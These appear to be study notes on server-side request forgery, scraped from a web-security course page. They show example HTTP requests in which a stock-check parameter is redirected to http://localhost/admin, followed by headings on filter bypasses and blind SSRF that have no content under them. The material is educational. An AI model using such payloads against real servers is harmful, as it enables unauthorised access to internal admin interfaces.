notes
Common SSRF attacks
SSRF attacks against the server itself
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
...
stockApi=http://localhost/adminSSRF attacks against other back-end systems
Circumventing common SSRF defenses
SSRF with blacklist-based input filters
SSRF with whitelist-based input filter
Bypassing SSRF filters via open redirection
Blind SSRF vulnerabilities
Finding hidden attack surface
Last updated